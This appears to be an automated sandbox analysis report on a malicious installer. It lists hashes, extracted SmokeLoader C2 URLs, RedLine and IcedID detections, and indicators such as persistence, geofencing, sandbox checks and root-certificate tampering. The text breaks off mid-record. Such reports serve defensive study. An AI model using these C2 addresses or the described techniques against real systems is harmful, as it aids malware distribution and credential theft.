Resubmissions
27-10-2021 12:55
211027-p592qaegd7 1027-10-2021 05:03
211027-fpnzwaaff8 1026-10-2021 14:24
211026-rqs6rshff8 10Analysis
-
max time kernel
1800s -
max time network
1807s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
27-10-2021 05:03
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
8dfefd1f56f2ac4f1869d86edbb4aa8f
-
SHA1
3a65b0920890fd7e8ae751ee15f76de281584010
-
SHA256
433e51a49b84a52cd5f740a12ec46a145d3c14a95e529d4ef32fd250e02829ed
-
SHA512
996a84df42b79c8786f4347b875621a476bd6a0e71d4c61fd47a726fb9f6717051d03d8b381233e7966c1a2150628b8b7986727298a6fc803aea504f96fd934c
Malware Config
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
icedid
1976347518
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral1/memory/2532-257-0x0000000000418542-mapping.dmp family_redline behavioral1/memory/2540-258-0x0000000000418D2E-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
resource yara_rule behavioral1/files/0x000500000001267c-70.dat aspack_v212_v242 behavioral1/files/0x000500000001267c-71.dat aspack_v212_v242 behavioral1/files/0x0006000000012634-72.dat aspack_v212_v242 behavioral1/files/0x0006000000012634-73.dat aspack_v212_v242 behavioral1/files/0x00050000000126a2-76.dat aspack_v212_v242 behavioral1/files/0x00050000000126a2-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 37 IoCs
pid Process 1676 setup_installer.exe 1160 setup_install.exe 320 Tue0978af55b9.exe 1264 Tue0985edbf92e08954.exe 1584 Tue09c257807a702a4.exe 396 Tue09a30919dc5f00.exe 1808 Tue09786995c7f02a923.exe 2036 Tue0947ef38552fc.exe 1280 Tue09c1731fe55c7.exe 1684 Tue091e2054cef7.exe 604 Tue0956c36b51.exe 1244 Tue097328c1b990.exe 1040 Tue093cbcf0222440.exe 1748 Tue09c6db969ab9.exe 1348 Tue09264824c4.exe 824 Tue09792fda06e.exe 1892 Tue093cbcf0222440.exe 1648 Tue0990c8b597f.exe 1944 Tue0971aafeebb6f.exe 2104 Tue0990c8b597f.tmp 2204 Tue0990c8b597f.exe 2280 Tue0990c8b597f.tmp 2532 Tue09c1731fe55c7.exe 2540 Tue09c6db969ab9.exe 3052 TiwxVUX_NRmfqyHfx8zmVK7w.exe 3044 TiwxVUX_NRmfqyHfx8zmVK7w.exe 2212 run.exe 2332 WG1uEEN.EXe 2360 run2.exe 2780 postback.exe 2544 Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe 2768 MSBuild.exe 1128 D1C0.exe 1164 SmartClock.exe 1720 472F.exe 2804 hfbrctu 2736 hfbrctu -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Tue09c257807a702a4.exe Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Tue09264824c4.exe -
Loads dropped DLL 64 IoCs
pid Process 1560 setup_x86_x64_install.exe 1676 setup_installer.exe 1676 setup_installer.exe 1676 setup_installer.exe 1676 setup_installer.exe 1676 setup_installer.exe 1676 setup_installer.exe 1160 setup_install.exe 1160 setup_install.exe 1160 setup_install.exe 1160 setup_install.exe 1160 setup_install.exe 1160 setup_install.exe 1160 setup_install.exe 1160 setup_install.exe 972 cmd.exe 560 cmd.exe 1580 cmd.exe 1992 cmd.exe 992 cmd.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1272 cmd.exe 1272 cmd.exe 1652 cmd.exe 1652 cmd.exe 1808 Tue09786995c7f02a923.exe 1808 Tue09786995c7f02a923.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 1280 Tue09c1731fe55c7.exe 1280 Tue09c1731fe55c7.exe 2028 cmd.exe 1276 cmd.exe 1276 cmd.exe 1720 cmd.exe 1784 cmd.exe 1784 cmd.exe 764 cmd.exe 1736 cmd.exe 1040 Tue093cbcf0222440.exe 1040 Tue093cbcf0222440.exe 1748 Tue09c6db969ab9.exe 1748 Tue09c6db969ab9.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1392 cmd.exe 1392 cmd.exe 1040 Tue093cbcf0222440.exe 824 Tue09792fda06e.exe 824 Tue09792fda06e.exe 1520 cmd.exe 1664 cmd.exe 1648 Tue0990c8b597f.exe 1648 Tue0990c8b597f.exe 1892 Tue093cbcf0222440.exe 1892 Tue093cbcf0222440.exe 396 Tue09a30919dc5f00.exe 396 Tue09a30919dc5f00.exe 1648 Tue0990c8b597f.exe 2104 Tue0990c8b597f.tmp 2104 Tue0990c8b597f.tmp 2104 Tue0990c8b597f.tmp 2104 Tue0990c8b597f.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSBuild = "\"C:\\Users\\Admin\\AppData\\Roaming\\MSBuild.exe\"" MSBuild.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 49 ipinfo.io 75 freegeoip.app 77 freegeoip.app 80 freegeoip.app 85 freegeoip.app 17 ip-api.com 47 ipinfo.io 48 ipinfo.io -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1280 set thread context of 2532 1280 Tue09c1731fe55c7.exe 74 PID 1748 set thread context of 2540 1748 Tue09c6db969ab9.exe 73 PID 1684 set thread context of 2768 1684 Tue091e2054cef7.exe 117 -
autoit_exe 5 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00050000000130d5-128.dat autoit_exe behavioral1/files/0x00050000000130d5-167.dat autoit_exe behavioral1/files/0x00050000000130d5-172.dat autoit_exe behavioral1/files/0x00050000000130d5-171.dat autoit_exe behavioral1/files/0x00050000000130d5-150.dat autoit_exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue0990c8b597f.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-7DTN0.tmp Tue0990c8b597f.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue0990c8b597f.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 1640 1348 WerFault.exe 56 1072 1584 WerFault.exe 44 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue09792fda06e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hfbrctu Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hfbrctu Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hfbrctu Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue09792fda06e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue09792fda06e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hfbrctu Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hfbrctu Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hfbrctu -
Kills process with taskkill 4 IoCs
pid Process 304 taskkill.exe 2372 taskkill.exe 108 taskkill.exe 2452 taskkill.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50ac31acefcad701 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a600000000020000000000106600000001000020000000dec803a34dfde313bb669695597efc1bdc836e20bfe2677029517c0838fedf23000000000e80000000020000200000008d5afb4a3df9004edcfacc101e2fbc4fb3c7cf4750e41e267d9a852a81aa0dc5900000005b614eee4b32e66fad0dd88649a63c85ccae3c8f3aaca0b42194de054e87de67580e1a72c4dfbe3f3273bebee246fccca5bf1fe6e80c75863d102f27e1962477eb9a9b7b3e0f950bb6d7a2b54d663d9e0cb1f805696c69d8df84cf60da490735cd69c0b4df5b0e544055e8d0284d31235d4df7bf10d74cd513e1c0bc421508d0b7a7048a4058df51a641b23f33c55071400000002d6383d47278660ebd665aac90b18b3123caf32ca9598336a883f6c8c1fd289ee210dbb4dc5071a23cf33bd1a9c3181ef61cfd937a8ba815cf6cd07cb7f1bfc7 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D3A06AC0-36E2-11EC-9C13-EA6A80FAACBA} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ja-JP = "ja-JP.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "342075813" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a6000000000200000000001066000000010000200000005a095da4cd57b7150cca1a7f03ec03d84b5ea8b2949f638ab124b4418aa117f6000000000e8000000002000020000000a6fc971e3625c83d8c4fd5306c0040c635ceec14d2a59886825d7ef1f176948d20000000c3977c2a8b98386ff435e0bf30464d7d56f306b9ee98be347795a355e3d3a5994000000094c4b3c2b9bbae74f57bf395ee9d8e53f774c52441de4f193933164c852eca1430972e0289dc71dd99e4c52fe54edba5e8234ba2e20448380c5ae09cc330be65 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Tue09786995c7f02a923.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 472F.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd 472F.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Tue093cbcf0222440.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Tue093cbcf0222440.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Tue093cbcf0222440.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Tue0971aafeebb6f.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 